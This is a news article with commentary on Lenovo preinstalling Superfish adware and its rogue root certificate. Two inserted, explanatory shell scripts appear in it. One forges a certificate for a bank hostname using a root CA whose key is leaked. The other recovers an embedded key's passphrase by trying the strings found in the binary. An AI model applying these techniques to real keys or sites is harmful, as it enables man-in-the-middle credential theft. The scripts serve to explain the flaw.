So long, Lenovo, and no thanks for all the super-creepy Superfish
Laptop biz CTO says there's no security risk – which is why it's labelled it 'severe'
+Comment Chinese PC maker Lenovo has published instructions on how to scrape off the Superfish adware it installed on its laptops – but still bizarrely insists it has done nothing wrong.
That's despite rating the severity of the deliberate infection as "high" on its own website. Well played, Lenonope.
Superfish was bundled on new Lenovo Windows laptops with a root CA certificate so it could intercept even HTTPS-protected websites visited by the user and inject ads into the pages. Removing the Superfish badware will leave behind the root certificate – allowing miscreants to lure Lenovo owners to websites masquerading as online banks, webmail and other legit sites, and steal passwords in man-in-the-middle attacks.
"Superfish was previously included on some consumer notebook products shipped in a short window between September and December to help customers potentially discover interesting products while shopping," Lenovo said in a statement on Thursday.
"We know that users reacted to this issue with concern, and so we have taken direct action to stop shipping any products with this software. We will continue to review what we do and how we do it in order to ensure we put our user needs, experience and priorities first."
Step-by-step instructions on how to remove the Superfish application, and the certificate it uses to impersonate trusted sites, have been published by Lenovo. Firefox users may have to take extra steps, because Firefox keeps its own certificate store separate from the Windows one, so the rogue root has to be removed from both.
If you use any of the following products, or someone you know does, you should check it for Superfish's crapware:
E10-30, Flex2 14, Flex2 15, Flex2 14D, Flex2 15D, Flex2 14 (BTM), Flex2 15 (BTM), Flex 10, G410, G510, G40-70, G40-30, G40-45, G50-70, G50-30, G50-45, Miix2 – 8, Miix2 – 10, Miix2 – 11, S310, S410, S415, S415 Touch, S20-30, S20-30 Touch, S40-70, U330P, U430P, U330Touch, U430Touch, U540Touch, Y430P, Y40-70, Y50-70, Yoga2-11BTM, Yoga2-11HSW, Yoga2-13, Yoga2Pro-13, Z40-70, Z40-75, Z50-70, and Z50-75.
Security experts are warning that the Superfish code is so badly designed that it is easy to extract the private key to its root CA certificate. This private key can be used to generate SSL certificates that a nefarious website can use to masquerade as a legit site.
For example, if you're a bad person working in a cafe with control over its public Wi-Fi, and you see an affected Lenovo user join your network, you can attempt to redirect their connection to an online bank to your own password-stealing server. Your server can use a rogue SSL certificate generated from Superfish's leaked private key to masquerade as the bank's dotcom. The Superfish root CA certificate on the laptop tells the browser to trust the dodgy connection – and the user will be none the wiser (unless they inspect the SSL session, which no one does).
In the past 24 hours websites such as canibesuperphished.com and filippo.io/Badfish/ have been created to identify PCs with the rogue root CA installed, using SSL certificates signed by the leaked private key. If you're on a Lenovo machine and you don't see any errors about the HTTPS connection to these websites in your web browsers, you've got the bad certificate installed.
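The following is an added example, not code from the article, from Lenovo, from Superfish or from the checker sites named above. It reproduces the mechanism those sites rely on with the openssl command-line tool: a stand-in "ad injector" root CA whose private key is assumed to be public (as Superfish's was), a certificate for a bank hostname forged with that key, and two clients that verify it, one trusting only an unrelated, legitimate root and one with the ad injector's root in its trust store. All names (the CA subjects, bank.example) are constructed for the example; it needs only a working openssl binary.

```shell
#!/bin/sh
# Added example: why a root CA with a leaked private key lets anyone impersonate
# any site. Not the article's code. Assumes the openssl CLI is installed.
set -eu

WORK="$(mktemp -d)"
trap 'rm -rf "$WORK"' EXIT

# A self-signed root CA. $1 = subject CN, $2 = output file prefix.
# "adroot" stands in for the Superfish root whose key ended up public.
make_root_ca() {
  openssl req -x509 -newkey rsa:2048 -nodes -sha256 -days 30 \
    -subj "/CN=$1" -keyout "$WORK/$2.key" -out "$WORK/$2.pem" >/dev/null 2>&1
}

# The attacker's forged leaf certificate for a hostname they do not own,
# signed with the leaked root key. No domain validation happens anywhere.
forge_leaf() {
  host="$1"
  openssl req -new -newkey rsa:2048 -nodes -sha256 -subj "/CN=$host" \
    -keyout "$WORK/leaf.key" -out "$WORK/leaf.csr" >/dev/null 2>&1
  printf 'subjectAltName=DNS:%s\nextendedKeyUsage=serverAuth\n' "$host" > "$WORK/leaf.ext"
  openssl x509 -req -sha256 -days 30 -in "$WORK/leaf.csr" \
    -CA "$WORK/adroot.pem" -CAkey "$WORK/adroot.key" -CAcreateserial \
    -extfile "$WORK/leaf.ext" -out "$WORK/leaf.pem" >/dev/null 2>&1
}

# What a browser effectively does: build a chain from the leaf to a root in
# its trust store and check the hostname. Prints "trusted" or "rejected".
# $1 = hostname being visited, $2 = the CA bundle this client trusts.
verify_as_client() {
  if openssl verify -CAfile "$2" -verify_hostname "$1" "$WORK/leaf.pem" >/dev/null 2>&1; then
    echo trusted
  else
    echo rejected
  fi
}

# Runs the whole scenario and prints "<clean client> <infected client>".
# Expected: "rejected trusted": the clean machine sees a certificate error,
# the machine carrying the ad injector's root silently accepts the forgery.
demo() {
  host="bank.example"   # constructed hostname for the example
  make_root_ca "Example Ad Injector Root CA" adroot      # key assumed leaked
  make_root_ca "Example Legitimate Root CA" legitroot    # what a clean client trusts
  forge_leaf "$host"
  clean="$(verify_as_client "$host" "$WORK/legitroot.pem")"
  infected="$(verify_as_client "$host" "$WORK/adroot.pem")"
  echo "$clean $infected"
}

demo
```

The check sites work the same way in reverse: they serve a certificate signed by the real leaked key, so a browser that trusts the Superfish root loads the page without complaint while a clean one refuses. The lesson for the removal instructions is that deleting the application alone changes nothing here; the root certificate is what makes `verify_as_client` say "trusted".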
Performed more than 138k checks for Superfish, >14500 resulted positive. Most traffic now coming from Japan. https://t.co/LGk8cAzhKn— Filippo Valsorda (@FiloSottile) February 20, 2015
Rob Graham from Errata Security searched the Superfish files using the good old UNIX command strings to pull out possible passwords to decrypt the software's embedded private key. He discovered the passphrase 'komodia' in just a few hours – allowing him to extract the secret key.
I extracted the #SuperFish certificate and cracked the password: http://t.co/mBg42VBn46 pic.twitter.com/fNLT4EHHhH— Rob Graham (@ErrataRob) February 19, 2015
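Here is the same technique as an added, self-contained example; it is not Graham's script and does not use any Superfish file. It builds a constructed "binary" that embeds a passphrase-protected PEM key among random bytes and a handful of plausible strings (the passphrase komodia and the other strings are constructed for the example), carves the key out, then feeds every printable string from the blob to openssl as a candidate passphrase until one decrypts the key. It assumes openssl is installed and uses strings(1) where available, falling back to tr otherwise.

```shell
#!/bin/sh
# Added example: recovering the passphrase of an embedded private key by
# trying every printable string in the file that carries it. Not the
# article's or Rob Graham's code. Assumes the openssl CLI; uses strings(1)
# if present, else a tr-based substitute.
set -eu

WORK="$(mktemp -d)"
trap 'rm -rf "$WORK"' EXIT

# Build the constructed target: an RSA key encrypted under $1, stored as
# plain PEM text between binary junk and other strings, the way a compiled
# program keeps its constants next to each other.
build_target() {
  openssl genrsa -aes256 -passout "pass:$1" -out "$WORK/secret.key" 2048 2>/dev/null
  {
    head -c 256 /dev/urandom
    printf '\0libcrypto.so.1.1\0VisualDiscovery\0%s\0\n' "$1"
    head -c 256 /dev/urandom
    printf '\n'
    cat "$WORK/secret.key"
    printf 'SSL Digestor\0GetProcAddress\0'
    head -c 256 /dev/urandom
  } > "$WORK/target.bin"
}

# The key is plain text between its PEM markers, so sed can lift it out.
extract_key() {
  sed -n '/-----BEGIN/,/-----END/p' "$WORK/target.bin" > "$WORK/carved.key"
}

# All printable runs of at least four characters, one per line.
harvest_strings() {
  if command -v strings >/dev/null 2>&1; then
    strings -n 4 "$1"
  else
    tr -c '[:print:]' '\n' < "$1" | grep -E '.{4,}'
  fi
}

# Try each string as the passphrase. "openssl rsa -check" exits non-zero when
# the key cannot be decrypted, so the first success is the answer.
find_passphrase() {
  harvest_strings "$WORK/target.bin" | sort -u | while IFS= read -r candidate; do
    if openssl rsa -in "$WORK/carved.key" -passin "pass:$candidate" -check -noout >/dev/null 2>&1; then
      echo "$candidate"
      break
    fi
  done
}

# Full run on the constructed target; prints the recovered passphrase.
recover() {
  build_target komodia
  extract_key
  find_passphrase
}

recover
```

The search space is tiny because a passphrase that a program must supply to itself has to be stored somewhere the program can read it, which is exactly what strings pulls out. Once the passphrase is known, `openssl rsa -in carved.key -passin pass:komodia -out clear.key` yields the plaintext key that the forged certificates in the previous example are signed with.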
That password is important for another reason too – it points to where Superfish's developers may have got their code. Komodia is a computer security firm which makes software called SSL Digestor, which works in a very similar way to Superfish to break SSL encryption and inject advertising.
Whoops, our bad
The software was preinstalled on a range of Lenovo's consumer laptops, a move Peter Hortensius, the firm's chief technology officer, admitted was a mistake. But he said that there were no security risks with using software which borks HTTPS.
"We’re not trying to get into an argument with the security guys," he told the Wall Street Journal. "They’re dealing with theoretical concerns. We have no insight that anything nefarious has occurred. But we agree that this was not something we want to have on the system, and we realized we needed to do more."
Normally Lenovo performs due diligence on all software it preinstalls but in this case the vetting procedure was not carried out well enough, he opined. The inclusion of such software is apparently covered in the tedious end user license agreement that no one reads.
In an extended statement Lenovo said Superfish wasn't a major contributor to the manufacturer's bottom line, and said the software did not build personal profiles of users – just advertising tailored to whatever the victim was browsing.
"Superfish has not been active on Lenovo laptops since December," Superfish's CEO Adi Pinhas told El Reg in a statement.
"It is important to note: Superfish is completely transparent in what our software does and at no time were consumers vulnerable - we stand by this today. Lenovo will be releasing a statement later today with all of the specifics that clarify that there has been no wrongdoing on our end."
That remains to be seen. Lenovo has a very close relationship with Microsoft as a top-flight box maker, and Redmond told El Reg today that it is probing the situation to see if the inclusion of the software breaks any of its licensing rules.
“We are looking into reports on this third-party issue,” a Microsoft spokesperson said.
+Comment by Reg man Iain Thomson
I've written this article on Lenovo hardware, indeed I've used ThinkPads for the last 15 years as a professional journalist and loved them dearly – the keyboard is superb, the build quality excellent, and my current custom system has lettering on keys worn off from repeated hammering.
But in light of the Superfish case, the firm can forget about any more repeat business. Enough is enough; this case is as egregious as the Sony rootkit debacle a decade ago that led to the music company being shunned by the security conscious.
No one does clean PC builds any more. They almost all come loaded with trial versions of applications, sample packs of stuff, and OEM tools. You expect it, and savvy users know to wipe clean any new machine. Non-savvy users are left to put up with it.
But although this stuff is annoying, there's a world of difference between getting a month's free trial of Norton or LoJack that's easily identifiable – and having something like Superfish's gear installed surreptitiously. Lenovo didn’t make any clear mention of having such code on its systems, because had it done so no one would have bought its hardware.
Thankfully, ThinkPads weren't getting the Superfish software, only consumer PCs. But that doesn't change the fact that Lenovo had such contempt for a portion of its user base that it was willing to sacrifice their privacy and security to make 30 pieces of silver.
If Lenovo is willing to build poorly written crapware like Superfish into its systems then the company can no longer be trusted to maintain even a pretense of having its customers' best interests at heart.
It'll be sad to let go of my laptop when it reaches end of life, but Lenovo won’t be getting another cent of my PC budget from now on. Based on the feedback we're getting from readers quite a few of you feel the same way. ®